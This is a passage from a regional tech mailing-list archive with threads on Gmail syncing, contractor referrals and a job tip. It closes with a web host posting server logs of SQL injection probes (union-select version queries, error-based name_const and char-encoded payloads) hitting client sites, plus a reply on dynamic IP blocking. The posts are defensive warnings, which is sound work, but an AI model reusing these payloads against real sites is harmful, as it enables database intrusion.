here in Amherst is around 60mbps down and 6mbps up. > > thanks, > James > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members -- Paul Bissex, software engineer http://paulbissex.com/ Greenfield MA 01301 USA 413-230-9451 From shel at principledprofit.com Thu Feb 11 00:20:39 2021 From: shel at principledprofit.com (Shel Horowitz) Date: Wed, 10 Feb 2021 19:20:39 -0500 Subject: [Hidden-tech] Apple Mail/GMail question Message-ID: I never use the Apple Mail program on my 2015 MacBook Air running High Sierra 10.13.6, but apparently I configured it at some point. Somehow it just got set to chime every time an email went in, so I went in to change the setting--and found 440,000 messages there! My question: If I empty the Apple Mail inbox, will all these messages still be in GMail where I want and need them? Thanks in advance, Shel Horowitz - "The Transformpreneur" ________________________________________________ Contact me to bake in profitability while addressing hunger, poverty, war, and catastrophic climate change * First business ever to be Green America Gold Certified * Inducted into the National Environmental Hall of Fame * Certified speaker: International Platform Association http://goingbeyondsustainability.com mailto:shel at greenandprofitable.com 413-586-2388 Award-winning, best-selling author of 10 books. Latest: Guerrilla Marketing to Heal the World (co-authored with Jay Conrad Levinson) Watch my TEDx Talk, "Impossible is a Dare: Business for a Better World" http://www.ted.com/tedx/events/11809 (move your mouse to "event videos") _________________________________________________ -------------- next part -------------- An HTML attachment was scrubbed... URL: From s at smichel.me Thu Feb 11 18:04:55 2021 From: s at smichel.me (Stephen Michel) Date: Thu, 11 Feb 2021 13:04:55 -0500 Subject: [Hidden-tech] Apple Mail/GMail question In-Reply-To: References: Message-ID: <78MDOQ.VZMVZ6LPVKAI3@smichel.me> Probably not. I haven't used GMail for a while so take this with a grain of salt, but I believe that GMail now has automatic filters into tabs like "promotions", etc. However, I believe this is only cosmetic ? while they are shown differently, they are actually all stored in the inbox. So when you connect with an external program like Apple Mail, it sees the emails from all these "automatic filters". It would not affect any emails that you've archived (that actually *is* moving to a different folder), so if you don't care about anything in those other tabs, it would be fine to delete. Again, I don't have a GMail account, so this is more of an educated guess; I would appreciate if someone who uses GMail & an external client could confirm. -- To respect your time, I try to write short, functional emails. On Wed, Feb 10, 2021 at 19:20, Shel Horowitz via Hidden-discuss wrote: > I never use the Apple Mail program on my 2015 MacBook Air running > High Sierra 10.13.6, but apparently I configured it at some point. > Somehow it just got set to chime every time an email went in, so I > went in to change the setting--and found 440,000 messages there! > > My question: If I empty the Apple Mail inbox, will all these messages > still be in GMail where I want and need them? > > Thanks in advance, > > Shel Horowitz - "The Transformpreneur" > ________________________________________________ > Contact me to bake in profitability while addressing hunger, > poverty, war, and catastrophic climate change > * First business ever to be Green America Gold Certified > * Inducted into the National Environmental Hall of Fame > * Certified speaker: International Platform Association > http://goingbeyondsustainability.com > mailto:shel at greenandprofitable.com 413-586-2388 > Award-winning, best-selling author of 10 books. > Latest: Guerrilla Marketing to Heal the World > (co-authored with Jay Conrad Levinson) > > Watch my TEDx Talk, > "Impossible is a Dare: Business for a Better World" > http://www.ted.com/tedx/events/11809 > (move your mouse to "event videos") > _________________________________________________ > From annamarie at PatientSympatheticCoaching.com Thu Feb 11 18:23:08 2021 From: annamarie at PatientSympatheticCoaching.com (Annamarie Pluhar) Date: Thu, 11 Feb 2021 13:23:08 -0500 Subject: [Hidden-tech] Apple Mail/GMail question In-Reply-To: References: Message-ID: No. Recommend you either remove the account on the MBA or archive your messages in Gmail. Annamarie Pluhar [Patient, Sympathetic Coaching](http://patientsympatheticcoaching.com) On 10 Feb 2021, at 19:20, Shel Horowitz via Hidden-discuss wrote: > I never use the Apple Mail program on my 2015 MacBook Air running High > Sierra 10.13.6, but apparently I configured it at some point. Somehow > it > just got set to chime every time an email went in, so I went in to > change > the setting--and found 440,000 messages there! > > My question: If I empty the Apple Mail inbox, will all these messages > still > be in GMail where I want and need them? > > Thanks in advance, > > Shel Horowitz - "The Transformpreneur" > ________________________________________________ > Contact me to bake in profitability while addressing hunger, > poverty, war, and catastrophic climate change > * First business ever to be Green America Gold Certified > * Inducted into the National Environmental Hall of Fame > * Certified speaker: International Platform Association > http://goingbeyondsustainability.com > mailto:shel at greenandprofitable.com 413-586-2388 > Award-winning, best-selling author of 10 books. > Latest: Guerrilla Marketing to Heal the World > (co-authored with Jay Conrad Levinson) > > Watch my TEDx Talk, > "Impossible is a Dare: Business for a Better World" > http://www.ted.com/tedx/events/11809 > (move your mouse to "event videos") > _________________________________________________ > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion > list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: From debchandler411 at gmail.com Thu Feb 11 18:43:55 2021 From: debchandler411 at gmail.com (Deborah Chandler) Date: Thu, 11 Feb 2021 13:43:55 -0500 Subject: [Hidden-tech] * * * Furniture refinishers? * * * Message-ID: Hi folks, Does anyone know of a furniture refinisher who can refinish the top of a desk? Thanks, Deb -------------- next part -------------- An HTML attachment was scrubbed... URL: From shel at principledprofit.com Thu Feb 11 19:05:15 2021 From: shel at principledprofit.com (Shel Horowitz) Date: Thu, 11 Feb 2021 14:05:15 -0500 Subject: [Hidden-tech] Apple Mail/GMail question In-Reply-To: References: Message-ID: Thanks. What is an MBA as you're using it here? And when you say no, you mean no it won't delete my gmail to empty the box or no, don't do it? Shel Horowitz - "The Transformpreneur" ________________________________________________ Contact me to bake in profitability while addressing hunger, poverty, war, and catastrophic climate change * First business ever to be Green America Gold Certified * Inducted into the National Environmental Hall of Fame * Certified speaker: International Platform Association http://goingbeyondsustainability.com mailto:shel at greenandprofitable.com 413-586-2388 Award-winning, best-selling author of 10 books. Latest: Guerrilla Marketing to Heal the World (co-authored with Jay Conrad Levinson) Watch my TEDx Talk, "Impossible is a Dare: Business for a Better World" http://www.ted.com/tedx/events/11809 (move your mouse to "event videos") _________________________________________________ On Thu, Feb 11, 2021 at 1:23 PM Annamarie Pluhar < annamarie at patientsympatheticcoaching.com> wrote: > No. Recommend you either remove the account on the MBA or archive your > messages in Gmail. > > Annamarie Pluhar > Patient, Sympathetic Coaching > > On 10 Feb 2021, at 19:20, Shel Horowitz via Hidden-discuss wrote: > > I never use the Apple Mail program on my 2015 MacBook Air running High > Sierra 10.13.6, but apparently I configured it at some point. Somehow it > just got set to chime every time an email went in, so I went in to change > the setting--and found 440,000 messages there! > > My question: If I empty the Apple Mail inbox, will all these messages > still be in GMail where I want and need them? > > Thanks in advance, > > Shel Horowitz - "The Transformpreneur" > ________________________________________________ > Contact me to bake in profitability while addressing hunger, > poverty, war, and catastrophic climate change > * First business ever to be Green America Gold Certified > * Inducted into the National Environmental Hall of Fame > * Certified speaker: International Platform Association > http://goingbeyondsustainability.com > mailto:shel at greenandprofitable.com 413-586-2388 > Award-winning, best-selling author of 10 books. > Latest: Guerrilla Marketing to Heal the World > (co-authored with Jay Conrad Levinson) > > Watch my TEDx Talk, > "Impossible is a Dare: Business for a Better World" > http://www.ted.com/tedx/events/11809 > (move your mouse to "event videos") > _________________________________________________ > > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From andrew at stakeholderscapital.com Fri Feb 12 14:41:13 2021 From: andrew at stakeholderscapital.com (Andrew Bellak) Date: Fri, 12 Feb 2021 09:41:13 -0500 Subject: [Hidden-tech] * * * Furniture refinishers? * * * In-Reply-To: References: Message-ID: <89AADA76-BA53-4E1A-9558-B2D9177100C3@stakeholderscapital.com> You could try Fesha Buddah. Tel: 510-409-7116 He did a really nice job making a table for us. Andrew Bellak CEO Registered Investment Advisor andrew at StakeholdersCapital.com www.StakeholdersCapital.com (o) 888-STK-HLDR (785-4537) x.2 (o) 413-306-3244 (f) 888-735-HLDR (4537) skype = andrewbellak twitter = stakeholderscap linkedin = http://ow.ly/4nn255 facebook = https://www.facebook.com/StakeHoldersCapital/ This message is intended only for the personal and confidential use of the designated recipient(s) named above. If you are not the intended recipient of this message you are hereby notified that any review, dissemination, distribution or copying of this message is strictly prohibited. This communication is for information purposes only and should not be regarded as an offer to sell or as a solicitation of an offer to buy any financial product, an official confirmation of any transaction, or as an official statement of Stakeholders Capital. Email transmission cannot be guaranteed to be secure or error-free. Therefore, we do not represent that this information is complete or accurate and it should not be relied upon as such. All information is subject to change without notice. This e-mail may be considered advertising under federal law. If you do not want to receive similar commercial electronic mail messages in the future from Stakeholders Capital, you may change your e-mail preferences at any time by contacting our office. Please consider the environment before printing this email. Sent from my iPhone > On Feb 11, 2021, at 5:42 PM, Deborah Chandler via Hidden-discuss wrote: > > ? > Hi folks, > > Does anyone know of a furniture refinisher who can refinish the top of a desk? > > Thanks, > Deb > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: From dstevens at tryandfindit.com Sun Feb 14 23:17:55 2021 From: dstevens at tryandfindit.com (Donald M Stevens) Date: Sun, 14 Feb 2021 23:17:55 +0000 Subject: [Hidden-tech] looking for someone that does sewer line / pipe repair Message-ID: Happy Valentine's Day all! I am looking for a contractor that repairs sewer lines. I have a repair needed for my house in East Longmeadow. I need a replacement of pipe and clean-out added. Thanks! Don TFI Technologies "we are here to help you...." 329 Pease Road East Longmeadow, MA 01028 Office: 413.308.4511 Cell / Text: 860.614.4153 Email: dstevens at tryandfindit.com LinkedIn: linkedin.com/in/don-stevens-504aa6b Skype: tryandfindit -------------- next part -------------- An HTML attachment was scrubbed... URL: From andrew at stakeholderscapital.com Sun Feb 14 23:22:54 2021 From: andrew at stakeholderscapital.com (Andrew Bellak) Date: Sun, 14 Feb 2021 18:22:54 -0500 Subject: [Hidden-tech] looking for someone that does sewer line / pipe repair In-Reply-To: References: Message-ID: <2a369243-e275-158e-6739-efa0032009da@stakeholderscapital.com> I just used Mark Dansereau of Western MA Rooter. He's terrific. (413) 253-1505 On 2/14/2021 6:17 PM, Donald M Stevens via Hidden-discuss wrote: > > Happy Valentine?s Day all! > > I am looking for a contractor that repairs sewer lines. I have a > repair needed for my house in East Longmeadow. > > I need a replacement of pipe and clean-out added. > > Thanks! > > Don > > *TFI Technologies* > > /?we are here to help you?.?/ > > 329 Pease Road > > East Longmeadow, MA 01028 > > Office: 413.308.4511 > > Cell / Text: 860.614.4153 > > Email: dstevens at tryandfindit.com > > LinkedIn: linkedin.com/in/don-stevens-504aa6b > > Skype: tryandfindit > > > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members -- Andrew Bellak CEO Registered Investment Advisor Andrew at StakeholdersCapital.com (o) 888-STK-HLDR (785-4537) x.2 (f) 888-735-HLDR (4537) he/him skype = andrewbellak twitter = @andrewbellak, @stakeholderscap This message is intended only for the personal and confidential use of the designated recipient(s) named above. If you are not the intended recipient of this message you are hereby notified that any review, dissemination, distribution or copying of this message is strictly prohibited. This communication is for information purposes only and should not be regarded as an offer to sell or as a solicitation of an offer to buy any financial product, an official confirmation of any transaction, or as an official statement of Stakeholders Capital. Email transmission cannot be guaranteed to be secure or error-free. Therefore, we do not represent that this information is complete or accurate and it should not be relied upon as such. All information is subject to change without notice. This e-mail may be considered advertising under federal law. If you do not want to receive similar commercial electronic mail messages in the future from Stakeholders Capital, you may change your e-mail preferences at any time by contacting our office. Please consider the environment before printing this email. -------------- next part -------------- An HTML attachment was scrubbed... URL: From delowing at gmail.com Mon Feb 15 03:56:05 2021 From: delowing at gmail.com (Doug Lowing) Date: Sun, 14 Feb 2021 22:56:05 -0500 Subject: [Hidden-tech] possibility: consider standard employment at this healthcare software co Message-ID: Hi Techies - A thought, entirely up to you. If this seems like spam, please have the moderators kill it. OTOH, the company could really use help servicing MA Medicaid. I acknowledge many of you are way ahead of me in technical abilities. If you want to try working for a company remotely with the usual for-hire benefits and detractions, I suggest looking at HealthEdge based out of Burlington MA. I get nothing out of this. Entirely your choice. I currently work for a company acquired by HealthEdge and they seem to try to balance life and work. I have worked remotely for the past year for a company based out of VA because of the pandemic, NP with them. Switched to the company from Burlington MA, np with them. I would really like to see extremely competent people making health software for MA better, bc the current stuff is, er, really needs improvement. Doug Lowing -------------- next part -------------- An HTML attachment was scrubbed... URL: From dstevens at tryandfindit.com Mon Feb 15 14:13:22 2021 From: dstevens at tryandfindit.com (Donald M Stevens) Date: Mon, 15 Feb 2021 14:13:22 +0000 Subject: [Hidden-tech] looking for someone that does sewer line / pipe repair In-Reply-To: References: Message-ID: Thanks for getting back to me Doug and Andrew, Here is a little more information, I have had the ?water jet? snake and camera process already done, ?water jet? snake cleared it up last year temporarily, Camera showed roots in the line at 170?, The auger / drill type snake that can cut through routes only goes 150?, My sewer line is over 200? long, with no clean-out in between my house and the road, So what I am looking for is someone to dig up, replace the pipe that is infiltrated by tree roots, then put in a clean out so that in the future someone could snake up the like or down the line to clear any future clogs. I have been calling contractors, but can?t get a call back, or the 2-3 people that did call back, don?t come out. Maybe it?s a small job, or I think because of all the snow storms, many of these contractors are out plowing, and that has been keeping them busy. Thanks! Don TFI Technologies ?we are here to help you?.? 329 Pease Road East Longmeadow, MA 01028 Office: 413.224.1568 Cell / Text: 860.614.4153 Email: dstevens at tryandfindit.com LinkedIn: linkedin.com/in/don-stevens-504aa6b Skype: tryandfindit From: Doug Lowing Sent: Sunday, February 14, 2021 10:26 PM To: Donald M Stevens Subject: Re: [Hidden-tech] looking for someone that does sewer line / pipe repair Hidden tech we may be, but when it gets down to it, we all realize the most important part of modern technology - a toilet that flushes successfully Maybe you need a replacement. Anyone you contact, ask if they will clean the line and send a camera on a flexible line. We had one company clear the sewer line because it really needed it. Several years later, we contracted with a different company, and they cleared the line, which really needed it again, and they said the existing line was not fractured, it simply had roots intruding through the (normal for a 50 yo line) joints and we should contact them again in 3 or 4 years. Point is, ask whatever company to clear the sewer line and ask them to give their best evaluation of the line. Much experience, with houses and mobile homes. - Doug On Sun, Feb 14, 2021 at 6:19 PM Donald M Stevens via Hidden-discuss > wrote: Happy Valentine?s Day all! I am looking for a contractor that repairs sewer lines. I have a repair needed for my house in East Longmeadow. I need a replacement of pipe and clean-out added. Thanks! Don TFI Technologies ?we are here to help you?.? 329 Pease Road East Longmeadow, MA 01028 Office: 413.308.4511 Cell / Text: 860.614.4153 Email: dstevens at tryandfindit.com LinkedIn: linkedin.com/in/don-stevens-504aa6b Skype: tryandfindit _______________________________________________ Hidden-discuss mailing list - home page: http://www.hidden-tech.net Hidden-discuss at lists.hidden-tech.net You are receiving this because you are on the Hidden-Tech Discussion list. If you would like to change your list preferences, Go to the Members page on the Hidden Tech Web site. http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: From andrew at stakeholderscapital.com Mon Feb 15 15:05:08 2021 From: andrew at stakeholderscapital.com (Andrew Bellak) Date: Mon, 15 Feb 2021 10:05:08 -0500 Subject: [Hidden-tech] looking for someone that does sewer line / pipe repair In-Reply-To: References: Message-ID: <3c82feff-f397-32a6-95fd-b9fc0cdbc5af@stakeholderscapital.com> Hey Don, Mark of W. MA Rooter has been in the business for like 30+ years. I'm sure he could refer you to a vendor if he doesn't do all the work. When I talked to Mark just recently for a job at my house, he described the water jet tech and pros and cons. Good luck. -ab On 2/15/2021 9:13 AM, Donald M Stevens wrote: > > Thanks for getting back to me Doug and Andrew, > > Here is a little more information, > > I have had the ?water jet? snake and camera process already done, > > ?water jet? snake cleared it up last year temporarily, > > Camera showed roots in the line at 170?, > > The auger / drill type snake that can cut through routes only goes 150?, > > My sewer line is over 200? long, with no clean-out in between my house > and the road, > > So what I am looking for is someone to dig up, > > replace the pipe that is infiltrated by tree roots, > > then put in a clean out so that in the future someone could snake up > the like or down the line to clear any future clogs. > > I have been calling contractors, but can?t get a call back, or the 2-3 > people that did call back, don?t come out. > > Maybe it?s a small job, or I think because of all the snow storms, > many of these contractors are out plowing, and that has been keeping > them busy. > > Thanks! > > Don > > ** > > *TFI Technologies* > > /?we are here to help you?.?/// > > 329 Pease Road > > East Longmeadow, MA 01028 > > Office: 413.224.1568 > > Cell / Text: 860.614.4153 > > Email:dstevens at tryandfindit.com > > LinkedIn:linkedin.com/in/don-stevens-504aa6b > > > Skype: tryandfindit > > *From:* Doug Lowing > *Sent:* Sunday, February 14, 2021 10:26 PM > *To:* Donald M Stevens > *Subject:* Re: [Hidden-tech] looking for someone that does sewer line > / pipe repair > > Hidden tech we may be, but when it gets down to it, we all realize the > most important part of modern technology - a toilet that flushes > successfully > > Maybe you need a replacement. Anyone you contact, ask if they will > clean the line and send a camera on a flexible line. We had one > company clear the sewer line because it really needed it. Several > years later, we contracted with a different company, and they cleared > the line, which really needed it again, and they said the existing > line was not fractured, it simply had roots intruding through the > (normal for a 50 yo line) joints and we should contact them again in 3 > or 4 years. > > Point is, ask whatever company to clear the sewer line and ask them to > give their best evaluation of the line. > > Much experience, with houses and mobile homes. > > - Doug > > On Sun, Feb 14, 2021 at 6:19 PM Donald M Stevens via Hidden-discuss > > wrote: > > Happy Valentine?s Day all! > > I am looking for a contractor that repairs sewer lines. I have a > repair needed for my house in East Longmeadow. > > I need a replacement of pipe and clean-out added. > > Thanks! > > Don > > *TFI Technologies* > > /?we are here to help you?.?/ > > 329 Pease Road > > East Longmeadow, MA 01028 > > Office: 413.308.4511 > > Cell / Text: 860.614.4153 > > Email: dstevens at tryandfindit.com > > LinkedIn: linkedin.com/in/don-stevens-504aa6b > > > Skype: tryandfindit > > _______________________________________________ > Hidden-discuss mailing list - home page: > http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > > You are receiving this because you are on the Hidden-Tech > Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > > -- Andrew Bellak CEO Registered Investment Advisor Andrew at StakeholdersCapital.com (o) 888-STK-HLDR (785-4537) x.2 (f) 888-735-HLDR (4537) he/him skype = andrewbellak twitter = @andrewbellak, @stakeholderscap This message is intended only for the personal and confidential use of the designated recipient(s) named above. If you are not the intended recipient of this message you are hereby notified that any review, dissemination, distribution or copying of this message is strictly prohibited. This communication is for information purposes only and should not be regarded as an offer to sell or as a solicitation of an offer to buy any financial product, an official confirmation of any transaction, or as an official statement of Stakeholders Capital. Email transmission cannot be guaranteed to be secure or error-free. Therefore, we do not represent that this information is complete or accurate and it should not be relied upon as such. All information is subject to change without notice. This e-mail may be considered advertising under federal law. If you do not want to receive similar commercial electronic mail messages in the future from Stakeholders Capital, you may change your e-mail preferences at any time by contacting our office. Please consider the environment before printing this email. -------------- next part -------------- An HTML attachment was scrubbed... URL: From wennemyr.magnus at gmail.com Mon Feb 15 18:24:42 2021 From: wennemyr.magnus at gmail.com (Magnus Wennemyr) Date: Mon, 15 Feb 2021 13:24:42 -0500 Subject: [Hidden-tech] looking for someone that does sewer line / pipe repair In-Reply-To: References: Message-ID: I had a good experience just last month with Always Reliable out of Hadley, (413) 250-7981, with the same problem, tree roots in my service line. They got back with me very quickly and were responsive throughout. magnus On Mon, Feb 15, 2021 at 9:20 AM Donald M Stevens via Hidden-discuss < hidden-discuss at lists.hidden-tech.net> wrote: > Thanks for getting back to me Doug and Andrew, > > > > Here is a little more information, > > > > I have had the ?water jet? snake and camera process already done, > > ?water jet? snake cleared it up last year temporarily, > > Camera showed roots in the line at 170?, > > The auger / drill type snake that can cut through routes only goes 150?, > > My sewer line is over 200? long, with no clean-out in between my house and > the road, > > > > So what I am looking for is someone to dig up, > > replace the pipe that is infiltrated by tree roots, > > then put in a clean out so that in the future someone could snake up the > like or down the line to clear any future clogs. > > > > I have been calling contractors, but can?t get a call back, or the 2-3 > people that did call back, don?t come out. > > Maybe it?s a small job, or I think because of all the snow storms, many of > these contractors are out plowing, and that has been keeping them busy. > > > > Thanks! > > Don > > > > *TFI Technologies* > > *?we are here to help you?.?* > > 329 Pease Road > > East Longmeadow, MA 01028 > > Office: 413.224.1568 > > Cell / Text: 860.614.4153 > > Email: dstevens at tryandfindit.com > > LinkedIn: linkedin.com/in/don-stevens-504aa6b > > > Skype: tryandfindit > > > > *From:* Doug Lowing > *Sent:* Sunday, February 14, 2021 10:26 PM > *To:* Donald M Stevens > *Subject:* Re: [Hidden-tech] looking for someone that does sewer line / > pipe repair > > > > Hidden tech we may be, but when it gets down to it, we all realize the > most important part of modern technology - a toilet that flushes > successfully > > Maybe you need a replacement. Anyone you contact, ask if they will clean > the line and send a camera on a flexible line. We had one company clear the > sewer line because it really needed it. Several years later, we contracted > with a different company, and they cleared the line, which really needed it > again, and they said the existing line was not fractured, it simply had > roots intruding through the (normal for a 50 yo line) joints and we should > contact them again in 3 or 4 years. > > Point is, ask whatever company to clear the sewer line and ask them to > give their best evaluation of the line. > > Much experience, with houses and mobile homes. > > > > - Doug > > > > On Sun, Feb 14, 2021 at 6:19 PM Donald M Stevens via Hidden-discuss < > hidden-discuss at lists.hidden-tech.net> wrote: > > Happy Valentine?s Day all! > > > > I am looking for a contractor that repairs sewer lines. I have a repair > needed for my house in East Longmeadow. > > I need a replacement of pipe and clean-out added. > > > > > > Thanks! > > Don > > > > *TFI Technologies* > > *?we are here to help you?.?* > > 329 Pease Road > > East Longmeadow, MA 01028 > > Office: 413.308.4511 > > Cell / Text: 860.614.4153 > > Email: dstevens at tryandfindit.com > > LinkedIn: linkedin.com/in/don-stevens-504aa6b > > Skype: tryandfindit > > > > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > -------------- next part -------------- An HTML attachment was scrubbed... URL: From tech at montaguewebworks.com Mon Feb 15 19:53:39 2021 From: tech at montaguewebworks.com (Michael Muller) Date: Mon, 15 Feb 2021 14:53:39 -0500 Subject: [Hidden-tech] Growing Botnet? Message-ID: <26c6a1fb-cc9b-2115-1692-059518fc497a@montaguewebworks.com> Hey HT web hosts out there, Due to recent hacking attempts against our servers, I have installed an IP Tracker that tracks and blocks any aggressive activity. Starting late last week we've found a growing number of IP numbers that appear to be attempting SQL Injection attacks. I've pasted a few snippets from our logs, below. Anyone else seeing this kind of activity on their servers? Every time I block an IP number they move to another IP number. The list of IPs hitting us is growing, and moving across multiple hosts. So far, I've contacted four different server hosts about the traffic coming from their servers. By far the most "infected" appears to be the Unified Layer family of hosting companies, which includes HostGator Mexico, webhostbox Bigrock India, and a number of others. Additional sources of the attacks are Hetzner.com from Germany; Ozkula from Turkey; and ColoCrossing from Buffalo NY. I'm sure more will be added as the days go on. Stay safe. Mik 94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33))) 94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A 94.130.76.249 13:38:47 fitzgerald-realestate.com /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33))) 94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1 94.130.76.249 13:39:01 fitzgerald-realestate.com /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 94.130.76.249 13:39:03 fitzgerald-realestate.com /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x 94.130.76.249 13:39:04 fitzgerald-realestate.com /z term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x 94.130.76.249 13:39:06 fitzgerald-realestate.com /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1 94.130.76.249 13:39:07 fitzgerald-realestate.com /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x 94.130.76.249 13:39:09 fitzgerald-realestate.com /z term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x 37.247.110.108 08:14:38 Greenfield-MA.gov /z term=Licensing%20AND%201=1 37.247.110.108 08:14:42 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 37.247.110.108 08:14:44 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x 37.247.110.108 08:14:46 Greenfield-MA.gov /z term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x 192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing 192.3.204.226 14:58:56 Greenfield-MA.gov /z term=Licensing2121121121212/1 192.3.204.226 14:58:57 Greenfield-MA.gov /z term=Licensing%20AND%201=1 192.3.204.226 14:58:59 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 192.3.204.226 14:59:00 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x -- --- Mik Muller, president Montague WebWorks 239-R Main Street, Greenfield, MA 413-320-5336 http://MontagueWebWorks.com Powered by ROCKETFUSION -------------- next part -------------- An HTML attachment was scrubbed... URL: From paul at bissex.net Mon Feb 15 21:25:10 2021 From: paul at bissex.net (Paul Bissex) Date: Mon, 15 Feb 2021 16:25:10 -0500 Subject: [Hidden-tech] Growing Botnet? In-Reply-To: <26c6a1fb-cc9b-2115-1692-059518fc497a@montaguewebworks.com> References: <26c6a1fb-cc9b-2115-1692-059518fc497a@montaguewebworks.com> Message-ID: <05b9d47c-f3bd-ef34-d8ea-455281f607a3@gmail.com> Hi Mik, I don't host others' sites these days but I do keep a close eye on suspicious requests to my pastebin site (dpaste.com) and maintain a blocklist. Out of curiosity I looked for the IPs you shared;? none of them are currently on my list. No SQL injection attempts either (though lots of 404s looking for wp-login.php). Because of the whack-a-mole syndrome you identify, last year I moved to a dynamic blocking setup. I have automation to detect and block bad-behaving IPs; then I age them out if they go three days without reoffending. The list is typically 1000 to 2000 IPs long. I've had good results from this, and zero complaints from users whose IP happened to have been previously used by a botnet/spammer. Good luck! P On 2/15/21 2:53 PM, Michael Muller via Hidden-discuss wrote: > > Hey HT web hosts out there, > > Due to recent hacking attempts against our servers, I have installed > an IP Tracker that tracks and blocks any aggressive activity. > > Starting late last week we've found a growing number of IP numbers > that appear to be attempting SQL Injection attacks. I've pasted a few > snippets from our logs, below. > > Anyone else seeing this kind of activity on their servers? Every time > I block an IP number they move to another IP number. The list of IPs > hitting us is growing, and moving across multiple hosts. > > So far, I've contacted four different server hosts about the traffic > coming from their servers. By far the most "infected" appears to be > the Unified Layer family of hosting companies, which includes > HostGator Mexico, webhostbox Bigrock India, and a number of others. > Additional sources of the attacks are Hetzner.com from Germany; Ozkula > from Turkey; and ColoCrossing from Buffalo NY. I'm sure more will be > added as the days go on. > > Stay safe. > > Mik > > 94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 > /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33))) > 94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A > 94.130.76.249 13:38:47 fitzgerald-realestate.com /z > 